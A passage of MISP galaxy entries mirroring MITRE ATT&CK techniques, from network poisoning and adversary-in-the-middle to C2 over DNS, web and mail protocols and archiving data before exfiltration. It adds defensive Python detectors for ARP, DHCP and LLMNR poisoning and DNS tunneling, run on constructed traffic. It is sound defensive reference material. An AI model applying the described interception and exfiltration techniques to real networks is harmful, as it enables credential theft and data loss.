As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.[S3Recon GitHub][GCPBucketBrute] Once storage objects are discovered, adversaries may leverage Data from Cloud Storage to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

Internal MISP references

UUID a0e40412-cbfb-477b-87fc-40f2c84d26be which can be used as unique global reference for Wordlist Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.003
Related clusters

To see the related clusters, click here.

Active Scanning

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.[Botnet Scan][OWASP Fingerprinting] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).

Internal MISP references

UUID a930437d-5a12-4dc4-b311-f5fd6a766c85 which can be used as unique global reference for Active Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

ARP Cache Poisoning

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.[RFC826 ARP] Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request then uses that information and stores it in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.[Sans ARP Spoofing Aug 2003][Cylance Cleaver]

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.[Sans ARP Spoofing Aug 2003]
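The poisoning behaviour described above (a reply racing the legitimate owner, a gratuitous reply, one host answering for several addresses) leaves an IP-to-MAC conflict in the traffic that a segment monitor can flag. The following is an added detection example, not part of the MISP or MITRE text; the ARP frames, MAC addresses and inventory entry are constructed.

```python
"""Flag ARP cache poisoning indicators in a sequence of ARP frames.

Added example, not part of the MISP/MITRE text. The frames are constructed to
show a reply that races the legitimate owner, a gratuitous reply, and the
IP-to-MAC conflict both leave behind, which is what monitors such as arpwatch
report.
"""
from collections import defaultdict
from dataclasses import dataclass

REQUEST, REPLY = 1, 2  # ARP opcodes (RFC 826)


@dataclass(frozen=True)
class ArpFrame:
    ts: float          # seconds since start of capture
    op: int            # REQUEST or REPLY
    sender_mac: str    # hardware address of the frame's sender
    sender_ip: str     # protocol address the sender claims to own
    target_ip: str     # address asked about (request) or the requester's address (reply)


def detect_arp_poisoning(frames, trusted=None, request_window=2.0):
    """Return (ts, kind, detail) findings.

    kind is one of:
      ip_mac_conflict    an IP already bound to one MAC is claimed by another
      unsolicited_reply  a reply with no request for that IP in the last request_window s
      multi_ip_mac       one MAC has replied for more than one IP

    `trusted` seeds ip->mac bindings from an inventory; without it the first
    binding seen is assumed legitimate, so the capture must start from a clean state.
    Legitimate hosts also send gratuitous ARP (boot, failover), so treat
    unsolicited_reply as supporting evidence and ip_mac_conflict as the alert.
    """
    bindings = dict(trusted or {})   # sender_ip -> MAC believed to own it
    pending = defaultdict(list)      # ip asked about -> timestamps of requests
    ips_per_mac = defaultdict(set)   # MAC -> IPs it has answered for
    findings = []

    for f in sorted(frames, key=lambda x: x.ts):
        # Requests and replies both carry a sender binding; learn it and flag contradictions.
        known = bindings.setdefault(f.sender_ip, f.sender_mac)
        if known != f.sender_mac:
            findings.append((f.ts, "ip_mac_conflict", f"{f.sender_ip}: {known} -> {f.sender_mac}"))

        if f.op == REQUEST:
            pending[f.target_ip].append(f.ts)
            continue
        if f.op != REPLY:
            continue

        # A reply nobody asked for is a gratuitous announcement.
        if not any(f.ts - t <= request_window for t in pending[f.sender_ip]):
            findings.append((f.ts, "unsolicited_reply", f"{f.sender_ip} announced by {f.sender_mac}"))

        ips_per_mac[f.sender_mac].add(f.sender_ip)
        if len(ips_per_mac[f.sender_mac]) > 1:
            findings.append((f.ts, "multi_ip_mac",
                             f"{f.sender_mac} answers for {sorted(ips_per_mac[f.sender_mac])}"))
    return findings


# Constructed capture: 192.168.1.10 asks for the gateway 192.168.1.1; the host at
# cc:..:99 answers before the real gateway (bb:..:01) and later announces itself as .10.
SAMPLE_FRAMES = [
    ArpFrame(0.0, REQUEST, "aa:aa:aa:aa:aa:01", "192.168.1.10", "192.168.1.1"),
    ArpFrame(0.1, REPLY,   "cc:cc:cc:cc:cc:99", "192.168.1.1",  "192.168.1.10"),
    ArpFrame(0.3, REPLY,   "bb:bb:bb:bb:bb:01", "192.168.1.1",  "192.168.1.10"),
    ArpFrame(5.0, REPLY,   "cc:cc:cc:cc:cc:99", "192.168.1.10", "192.168.1.1"),
]
TRUSTED_GATEWAY = {"192.168.1.1": "bb:bb:bb:bb:bb:01"}  # constructed inventory entry

if __name__ == "__main__":
    for ts, kind, detail in detect_arp_poisoning(SAMPLE_FRAMES, TRUSTED_GATEWAY):
        print(f"t={ts:4.1f}s {kind:18} {detail}")
```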

Internal MISP references

UUID 03ef726b-ac65-4e23-8130-9d299a3f458a which can be used as a unique global reference for ARP Cache Poisoning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.002
Related clusters

To see the related clusters, click here.

DHCP Spoofing

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.[rfc2131] The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.[new_rogue_DHCP_serv_malware][w32.tidserv.g] Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending an INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.[rfc3315] Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e., Service Exhaustion Flood) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.
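Both abuses described above, a rogue server injecting its own configuration into the OFFER/ACK half of the exchange and a flood of DISCOVER messages draining the pool, can be checked from DHCP message records. The following is an added detection example, not part of the MISP or MITRE text; the messages, addresses and the allow-lists are constructed.

```python
"""Detect rogue DHCP servers, rogue DNS options and pool exhaustion from DHCP messages.

Added example, not part of the MISP/MITRE text. Messages are constructed in a
simplified form of what a DHCP sensor or server log exposes; ALLOWED_SERVERS
and ALLOWED_DNS stand in for a site's real inventory.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class DhcpMsg:
    ts: float
    kind: str              # DISCOVER, OFFER, REQUEST or ACK
    client_mac: str        # chaddr of the client the message concerns
    server_ip: str = ""    # option 54 (server identifier); OFFER/ACK only
    dns: tuple = ()        # option 6 (domain name servers); OFFER/ACK only
    yiaddr: str = ""       # address offered/assigned


def detect_rogue_dhcp(msgs, allowed_servers, allowed_dns):
    """Flag OFFER/ACK messages from unknown servers or carrying unapproved DNS servers.

    Both checks sit on the server->client half of the exchange, because that is
    where a rogue server injects the malicious configuration.
    """
    findings = []
    for m in sorted(msgs, key=lambda x: x.ts):
        if m.kind not in ("OFFER", "ACK"):
            continue
        if m.server_ip not in allowed_servers:
            findings.append((m.ts, "rogue_server",
                             f"{m.kind} from {m.server_ip} to {m.client_mac} ({m.yiaddr})"))
        bad_dns = [d for d in m.dns if d not in allowed_dns]
        if bad_dns:
            findings.append((m.ts, "rogue_dns", f"{m.server_ip} pushed DNS {bad_dns} to {m.client_mac}"))
    return findings


def max_distinct_discover_clients(msgs, window=10.0):
    """Largest number of distinct client MACs that sent DISCOVER within any `window` seconds.

    A normal segment shows a handful; an exhaustion flood shows one per free
    address in the pool, each with a fabricated MAC. Compare against pool size.
    """
    discovers = sorted((m.ts, m.client_mac) for m in msgs if m.kind == "DISCOVER")
    counts = {}          # mac -> occurrences inside the current window
    left = 0
    best = 0
    for ts, mac in discovers:
        counts[mac] = counts.get(mac, 0) + 1
        while discovers[left][0] < ts - window:   # slide the window's left edge forward
            old_mac = discovers[left][1]
            counts[old_mac] -= 1
            if counts[old_mac] == 0:
                del counts[old_mac]
            left += 1
        best = max(best, len(counts))
    return best


ALLOWED_SERVERS = {"10.0.0.1"}              # constructed: the site's one real DHCP server
ALLOWED_DNS = {"10.0.0.53", "10.0.0.54"}    # constructed: approved resolvers

SAMPLE_MSGS = [
    DhcpMsg(0.0, "DISCOVER", "aa:aa:aa:aa:aa:01"),
    DhcpMsg(0.1, "OFFER",    "aa:aa:aa:aa:aa:01", "10.0.0.1",  ("10.0.0.53",), "10.0.0.50"),
    DhcpMsg(0.1, "OFFER",    "aa:aa:aa:aa:aa:01", "10.0.0.99", ("10.0.0.99",), "10.0.0.51"),  # rogue
    DhcpMsg(0.2, "REQUEST",  "aa:aa:aa:aa:aa:01"),
    DhcpMsg(0.3, "ACK",      "aa:aa:aa:aa:aa:01", "10.0.0.99", ("10.0.0.99",), "10.0.0.51"),  # rogue offer won
] + [
    # 25 DISCOVERs from 25 fabricated MACs within 2.4 s: the exhaustion shape
    DhcpMsg(10.0 + i * 0.1, "DISCOVER", f"de:ad:be:ef:00:{i:02x}") for i in range(25)
]

if __name__ == "__main__":
    for ts, kind, detail in detect_rogue_dhcp(SAMPLE_MSGS, ALLOWED_SERVERS, ALLOWED_DNS):
        print(f"t={ts:4.1f}s {kind:13} {detail}")
    print("max distinct DISCOVER clients in 10 s:",
          max_distinct_discover_clients(SAMPLE_MSGS, window=10.0))
```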

Internal MISP references

UUID 52dabfcc-b7a4-4334-9014-ab9d82f5527b which can be used as a unique global reference for DHCP Spoofing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.003
Related clusters

To see the related clusters, click here.

LLMNR/NBT-NS Poisoning and SMB Relay

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name.[Wikipedia LLMNR][TechNet NetBIOS]

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.[byt3bl33d3r NTLM Relaying][Secure Ideas SMB Relay] Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.[GitHub NBNSpoof][Rapid7 LLMNR Spoofer][GitHub Responder]
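A legitimate host answers LLMNR (UDP 5355) or NBT-NS (UDP 137) only for its own name, so the poisoning described above shows up as one responder answering for many unrelated names, or answering a deliberate query for a name that is known not to exist. The following is an added detection example over constructed traffic records, not part of the MISP or MITRE text; the hosts, names and canary are all made up.

```python
"""Spot LLMNR/NBT-NS poisoning in name-resolution traffic records.

Added example, not part of the MISP/MITRE text; the events are constructed.
A host legitimately answers LLMNR (UDP 5355) or NBT-NS (UDP 137) only for its
own name, so one responder answering for many unrelated names, or answering a
canary query for a non-existent name, is the poisoning behaviour described.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NameResEvent:
    ts: float
    proto: str     # "LLMNR" (UDP 5355) or "NBT-NS" (UDP 137)
    kind: str      # "query" or "response"
    src_ip: str    # host that sent the query or the response
    name: str      # name being resolved (matched case-insensitively)


def detect_name_poisoning(events, canary_names=(), max_names_per_responder=2):
    """Return (ts, kind, detail) findings.

    canary_answered        a response for a name known not to exist (only a poisoner answers)
    promiscuous_responder  one source has answered for more than max_names_per_responder names
    """
    canaries = {n.lower() for n in canary_names}
    answered = defaultdict(set)   # responder ip -> names it has answered for
    findings = []
    for e in sorted(events, key=lambda x: x.ts):
        if e.kind != "response":
            continue
        name = e.name.lower()
        if name in canaries:
            findings.append((e.ts, "canary_answered", f"{e.src_ip} answered {e.proto} for {e.name}"))
        answered[e.src_ip].add(name)
        if len(answered[e.src_ip]) == max_names_per_responder + 1:   # fire once per responder
            findings.append((e.ts, "promiscuous_responder",
                             f"{e.src_ip} answers for {sorted(answered[e.src_ip])}"))
    return findings


# Constructed traffic: two workstations look up mistyped or stale names and one
# host (10.0.0.66) answers every query; 10.0.0.20 answers only for its own name.
SAMPLE_EVENTS = [
    NameResEvent(0.0, "LLMNR",  "query",    "10.0.0.11", "fileserver01"),
    NameResEvent(0.1, "LLMNR",  "response", "10.0.0.66", "fileserver01"),
    NameResEvent(1.0, "NBT-NS", "query",    "10.0.0.12", "PRINTSRV"),
    NameResEvent(1.1, "NBT-NS", "response", "10.0.0.66", "PRINTSRV"),
    NameResEvent(2.0, "LLMNR",  "query",    "10.0.0.11", "fileshare-old"),
    NameResEvent(2.1, "LLMNR",  "response", "10.0.0.66", "fileshare-old"),
    NameResEvent(3.0, "LLMNR",  "query",    "10.0.0.12", "ws-20"),
    NameResEvent(3.1, "LLMNR",  "response", "10.0.0.20", "ws-20"),
    NameResEvent(9.0, "LLMNR",  "query",    "10.0.0.99", "canary-9f2a1c"),   # monitor's canary lookup
    NameResEvent(9.1, "LLMNR",  "response", "10.0.0.66", "canary-9f2a1c"),
]
CANARY_NAMES = ("canary-9f2a1c",)   # constructed: a name that exists nowhere on the network

if __name__ == "__main__":
    for ts, kind, detail in detect_name_poisoning(SAMPLE_EVENTS, CANARY_NAMES):
        print(f"t={ts:4.1f}s {kind:22} {detail}")
```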

Internal MISP references

UUID b44a263f-76b2-4a1f-baeb-dd285974eca6 which can be used as a unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1557.001
Related clusters

To see the related clusters, click here.

Adversary-in-the-Middle

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.[Rapid7 MiTM Basics]

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.[ttint_rat][dns_changer_trojans][ad_blocker_with_miner] Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.[volexity_0day_sophos_FW] Downgrade Attacks can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.[mitm_tls_downgrade_att][taxonomy_downgrade_att_tls][tlseminar_downgrade_att]

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in Transmitted Data Manipulation. Adversaries can set up a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to Impair Defenses and/or in support of a Network Denial of Service.

Internal MISP references

UUID d98dbf30-c454-42ff-a9f3-2cd3319cc0d9 which can be used as a unique global reference for Adversary-in-the-Middle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

DNS - Duplicate

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.[PAN DNS Tunneling][Medium DnsTunneling]
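The tunneling described above has a measurable shape in resolver logs: one domain receiving long, high-entropy, rarely repeated subdomains, often with record types (TXT, NULL, CNAME) that carry more payload than A/AAAA. The following is an added scoring example, not part of the MISP or MITRE text; the log lines are constructed in a simplified BIND-style form, exfil-example.net is a placeholder domain, and the thresholds are starting points to tune against a site's own baseline.

```python
"""Score DNS query logs for tunneling indicators: long, high-entropy, rarely
repeated subdomains and bulky record types concentrated on one domain.

Added example, not part of the MISP/MITRE text. The log lines are constructed in
a simplified BIND-style 'client IP#port: query: NAME IN TYPE' shape, and the
domain exfil-example.net is a placeholder. Thresholds are starting points to
tune against a site's own baseline.
"""
import math
import re
from collections import defaultdict

LOG_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>[A-Z]+)")


def registered_domain(name):
    """Last two labels of a name. Naive: real tooling should use the Public Suffix List."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    """Bits per character; encoded data scores high, dictionary words score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_domains(log_lines, min_queries=5):
    """Per registered domain, compute four indicators and a 0-4 score (4 = all tripped)."""
    per_domain = defaultdict(list)   # domain -> [(subdomain, qtype), ...]
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        name = m["name"].rstrip(".").lower()
        dom = registered_domain(name)
        sub = name[: -len(dom)].rstrip(".")          # everything left of the registered domain
        per_domain[dom].append((sub, m["qtype"]))

    results = {}
    for dom, rows in per_domain.items():
        if len(rows) < min_queries:                  # too few queries to judge
            continue
        subs = [s for s, _ in rows]
        avg_len = sum(len(s) for s in subs) / len(subs)
        unique_ratio = len(set(subs)) / len(subs)   # tunnels almost never repeat a subdomain
        avg_entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        bulky = sum(1 for _, t in rows if t in ("TXT", "NULL", "CNAME")) / len(rows)
        score = sum([avg_len > 30, unique_ratio > 0.9, avg_entropy > 3.5, bulky > 0.5])
        results[dom] = {
            "queries": len(rows),
            "avg_sub_len": round(avg_len, 1),
            "unique_ratio": round(unique_ratio, 2),
            "avg_entropy": round(avg_entropy, 2),
            "bulky_type_ratio": round(bulky, 2),
            "score": score,
        }
    return results


_CHUNK = "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9t0"   # constructed stand-in for an encoded data chunk
SAMPLE_LOG = [
    # ordinary browsing and mail lookups: short, repeated labels, A/AAAA records
    "client 10.0.0.5#53211: query: www.example.com IN A",
    "client 10.0.0.5#53212: query: www.example.com IN AAAA",
    "client 10.0.0.6#41002: query: mail.example.com IN A",
    "client 10.0.0.6#41003: query: www.example.com IN A",
    "client 10.0.0.7#39921: query: mail.example.com IN A",
    "client 10.0.0.7#39922: query: www.example.com IN A",
] + [
    # six TXT queries, each with a distinct 40-character label: the tunnel shape
    f"client 10.0.0.23#{50000 + i}: query: {_CHUNK[i:] + _CHUNK[:i]}.exfil-example.net IN TXT"
    for i in range(6)
]

if __name__ == "__main__":
    for dom, stats in sorted(score_domains(SAMPLE_LOG).items(), key=lambda kv: -kv[1]["score"]):
        print(f"{dom:20} {stats}")
```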

Internal MISP references

UUID 5c6c3492-5dbc-43ee-a3f2-ba1976d3b379 which can be used as a unique global reference for DNS - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.004
Related clusters

To see the related clusters, click here.

File Transfer Protocols

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID a4f21b08-bf5b-4ba3-af69-cce01a467859 which can be used as a unique global reference for File Transfer Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.002
Related clusters

To see the related clusters, click here.

Mail Protocols

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID 350fd3f9-2d62-498f-be62-fc4b9907ff02 which can be used as a unique global reference for Mail Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.003
Related clusters

To see the related clusters, click here.

Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S[CrowdStrike Putter Panda] and WebSocket[Brazking-Websockets] that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Internal MISP references

UUID 9a21ec7b-9714-4073-9bf3-4df41995c698 which can be used as a unique global reference for Web Protocols in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1071.001
Related clusters

To see the related clusters, click here.

Application Layer Protocol

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

Internal MISP references

UUID 8a7afe43-b814-41b3-8bd8-e1301b8ba5b4 which can be used as a unique global reference for Application Layer Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Application Window Discovery

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.[Prevailion DarkWatchman 2021] For example, information about application windows could be used to identify potential data to collect as well as to identify security tooling (Security Software Discovery) to evade.[ESET Grandoreiro April 2020]

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as Command and Scripting Interpreter commands and Native API functions.

Internal MISP references

UUID 3b2f435a-8666-43b5-9883-f2808eebd726 which can be used as a unique global reference for Application Window Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Archive via Custom Method

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.[ESET Sednit Part 2]

Internal MISP references

UUID 41da2363-af05-46b8-990e-2cc749b5aac8 which can be used as a unique global reference for Archive via Custom Method in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.003
Related clusters

To see the related clusters, click here.

Archive via Library

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile [PyPI RAR], libzip [libzip], and zlib [Zlib Github]. Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

Internal MISP references

UUID ccf06b4a-bc33-4db1-bc66-74a0a7c31451 which can be used as a unique global reference for Archive via Library in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.002
Related clusters

To see the related clusters, click here.

Archive via Utility

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems.

On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. Remote Data Staging).[diantz.exe_lolbas] xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use certutil to Base64 encode collected data before exfiltration.

Adversaries may also use third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.[7zip Homepage][WinRAR Homepage][WinZip Homepage]

Internal MISP references

UUID 3042a254-a2a9-4cb9-9939-087a24c64907 which can be used as a unique global reference for Archive via Utility in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1560.001
Related clusters

To see the related clusters, click here.

Archive Collected Data

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

Internal MISP references

UUID ebd3f870-c513-4fb0-b133-15ffc1f91db2 which can be used as a unique global reference for Archive Collected Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Audio Capture

An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening in on sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Internal MISP references

UUID 2be5c67a-edae-4083-8b6d-f99eaa622ed4 which can be used as a unique global reference for Audio Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Automated Collection

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.

Internal MISP references

UUID 107ad6c5-79b1-468c-9519-1578bee2ac49 which can be used as a unique global reference for Automated Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Traffic Duplication

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device.[Cisco Traffic Mirroring][Juniper Traffic Mirroring]

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through ROMMONkit or Patch System Image.[US-CERT-TA18-106A][Cisco Blog Legacy Device Attacks]

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.[AWS Traffic Mirroring][GCP Packet Mirroring][Azure Virtual Network TAP]

